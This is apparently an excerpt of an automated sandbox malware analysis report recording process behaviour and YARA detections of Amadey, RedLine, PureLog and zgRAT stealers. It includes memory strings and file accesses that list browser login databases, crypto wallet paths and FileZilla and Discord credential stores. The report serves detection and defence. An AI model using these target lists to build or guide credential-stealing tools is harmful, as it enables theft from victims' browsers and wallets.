Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141670101\7fd483a527.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141670101\7fd483a527.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141680101\26335e66aa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141680101\26335e66aa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141690101\8c12a2b1f0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141690101\8c12a2b1f0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141710121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141710121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141730101\d8be899fe4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141730101\d8be899fe4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141740101\48726a724d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141740101\48726a724d.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 11_2_00DA93A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

11_2_00DA93A7

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 11_2_00D861F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegSetValueExA,RegOpenKeyExA,RegEnumValueA,DeleteObject,DeleteObject,DeleteObject,LookupAccountNameA,

11_2_00D861F0

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_00FEBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

51_2_00FEBCD2

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

25_2_00406831

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.23.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.23.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.23.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.23.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.23.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 00000000.00000002.930052288.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.969111930.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.925833234.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.889046034.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.966341892.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.928647804.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1339718622.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3354500885.0000000000D81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 6776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PfOHmro.exe PID: 4060, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 00000035.00000002.1706949213.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
